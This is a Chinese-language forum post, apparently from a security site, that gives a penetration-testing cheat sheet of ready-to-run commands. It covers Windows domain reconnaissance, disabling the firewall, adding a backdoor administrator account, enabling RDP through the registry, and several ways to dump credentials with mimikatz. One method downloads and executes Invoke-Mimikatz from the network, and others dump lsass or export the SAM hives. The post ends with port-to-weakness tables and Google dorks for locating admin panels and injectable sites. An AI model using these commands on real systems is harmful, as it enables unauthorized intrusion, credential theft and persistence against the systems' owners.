将自己用到的命令你个分享出来,希望大家给补充一下
———————————————————————————————————————————————————-
域常用操作命令:
ipconfig /all —— 查询本机IP段,所在域等
net user —— 本机用户列表
net localhroup administrators —— 本机管理员[通常含有域用户]
net user /domain —— 查询域用户
net group /domain —— 查询域里面的工作组
net group “domain admins” /domain —— 查询域管理员用户组
net localgroup administrators /domain —— 登录本机的域管理员
net localgroup administrators workgroup\user001 /add ——域用户添加到本机
net group “domain controllers” /domain —— 查看域控制器(如果有多台)
net time /domain —— 判断主域,主域服务器都做时间服务器
net config workstation —— 当前登录域
net session —— 查看当前会话
net use \\ip\ipc$ pawword /user:username —— 建立IPC会话[空连接-***]
net share —— 查看SMB指向的路径[即共享]
net view —— 查询同一域内机器列表
net view \\ip —— 查询某IP共享
net view /domain —— 查询域列表
net view /domain:domainname —— 查看workgroup域中计算机列表
net start —— 查看当前运行的服务
net accounts —— 查看本地密码策略
net accounts /domain —— 查看域密码策略
nbtstat –A ip ——netbios 查询
netstat –an/ano/anb —— 网络连接查询
route print —— 路由表
tasklist /V —– 查看进程[显示对应用户]
tasklist /S ip /U domain\username /P /V —– 查看远程计算机进程列表
qprocess * —– 类似tasklist
qprocess /SERVER:IP —– 远程查看计算机进程列表
nslookup –qt-MX Yahoo.com —– 查看邮件服务器
whoami /all —– 查询当前用户权限等
set —– 查看系统环境变量
systeminfo —– 查看系统信息
qwinsta —– 查看登录情况
qwinsta /SERVER:IP —– 查看远程登录情况
fsutil fsinfo drives —– 查看所有盘符
gpupdate /force —– 更新域策略
wmic bios —– 查看bios信息
wmic qfe —– 查看补丁信息
wmic qfe get hotfixid —– 查看补丁-Patch号
wmic startup —– 查看启动项
wmic service —– 查看服务
wmic os —– 查看OS信息
———————————————————————————————————————————————————-
window命令集
net user 查看用户列表
quser 查看用户登录情况
tasklist /svc 查看系统进程
logoff uid 注销账号(配合quser)
netstat -ano 查看端口开放及访问情况
net localgroup administrators 查看名为administrators的工作组
netsh firewall set opmode mode=disable 关闭防火墙
net user admin 123456 /add 添加一个名为admin 密码为123456的账号
net localgroup administrators admin /add 将用户admin添加到管理员组
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
命令开启3389
>覆盖 >>追加
———————————————————————————————————————————————————-
nmap localhost #查看主机当前开放的端口
nmap -p 1024-65535 localhost #查看主机端口(1024-65535)中开放的端口
nmap -PS 192.168.21.163 #探测目标主机开放的端口
nmap -PS22,80,3306 192.168.21.163 #探测所列出的目标主机端口
nmap -O 192.168.21.163 #探测目标主机操作系统类型
nmap -A 192.168.21.163 #探测目标主机操作系统类型
nmap –help #更多nmap参数请查询帮助信息
———————————————————————————————————————————————————————
抓登陆明文密码工具
方法一
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit” >> password.txt
方法二
powershell “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds”
方法三
reg save hklm\sam sam.hive
reg save hklm\system system.hive 导hash
lsadump::sam /sam:sam.hive /system:system.hive mimikatz //解析hiv
SAMInside.exe //可解密hive
方法四
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp //导出lsadump
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” > mima.txt
———————————————————————————————————————————————————-
常用端口对应漏洞
端口 服务 说明
21 FTP 主要看是否支持匿名,也可跑弱口令
22 SSH 弱口令爆破
23 telnet 弱口令爆破
80-90 WEB 常见WEB漏洞以及一些为管理后台
161 snmp public弱口令
389 ldap 是否为匿名访问
443 openssl heart出血以及一些WEB漏洞测试
445 smb 跑弱口令,检测是否有ms_08067等溢出
873 rsync 是否为匿名访问,也可以跑弱口令
1025 RPC NFS匿名访问
1099 java rmi 远程命令执行漏洞
1433 mssql 弱口令爆破
1521 oracle 弱口令爆破
2082/2083 cpanel主机管理系统登陆 弱口令爆破
2222 DA虚拟主机管理系统登陆 弱口令爆破
2601,2604 zebra路由器 默认密码zebra
3128 squid代理默认端口 如果没设置口令很可能就直接漫游内网
3306 mysql 弱口令爆破
3312/3311 kangle主机管理系统登陆 说明
3389 RDP 弱口令爆破,SHIFT后门,放大镜,输入法漏洞
4440 rundeck web
4848 GlassFish web中间件 弱口令admin/adminadmin
5432 postgres 弱口令爆破
5560,7778 iSqlPlus
5900,5901,5902 vnc 弱口令爆破
5984 CouchDB http://xxx:5984/_utils/
6082 varnish
6379 redis 一般无验证,直接访问
7001,7002 weblogic 弱口令爆破
7778 Kloxo 主机控制面板登录
8080 tomcat\jboss 弱口令爆破,jboss后台可能不验证
8649 ganglia
8080-8090 常见WEB端口
8083 Vestacp主机管理系统 (国外用较多)
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口 说明
9000 fcgi fcgi php命令执行漏洞
9200 elasticsearch 代码执行
9043 websphere 弱口令爆破
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache 内存泄露
27017 mongodb 未授权访问
28017 mongodb 未授权访问
50000 Upnp SAP命令执行
50060 hadoop WEB 未授权访问
50030 hadoop WEB 未授权访问
常见端口列表整理如下:
21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,
5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060
———————————————————————————————————————————————————-
谷歌黑客
inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用
intext: 只搜索网页部分中包含的文字(也就是忽略了标题、URL等的文字)
filetype:搜索文件的后缀或者扩展名
intitle:限制你搜索的网页标题
link: 可以得到一个所有包含了某个指定URL的页面列表
info:查找指定站点的一些基本信息
cache:搜索Google里关于某些内容的缓存
查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
查找可注入点:site:域名 inurl:aspx|jsp|php|asp
查找上传漏洞:site:域名 inurl:file|load|editor|Files找eweb
编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的数据库:site:域名 filetype:mdb|asp|#
查看脚本类型:site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵:inurl:cms/data/templates/images/index/
列:尝试搜索一些学校网站的后台,语法为:”site:http://edu.cn intext: 后台管理”
意思为搜索网页正文中包含有“后台管理” 并且域名后缀是http://edu.cn的网站,
利用Goole搜索,我们可以很轻松地得到想要的信息,还可以用它来收集数据库文件、SQL注入、配置信息、源代码泄露、未授权访问和robots.txt等敏感信息。
注:Google搜索的思路同样可以用在百度、雅虎、Bing、Shodan等搜索引擎上,语法大同小异。
来源:freebuf.com 2020-08-10 15:57:20 by: 24kBACK
请登录后发表评论
注册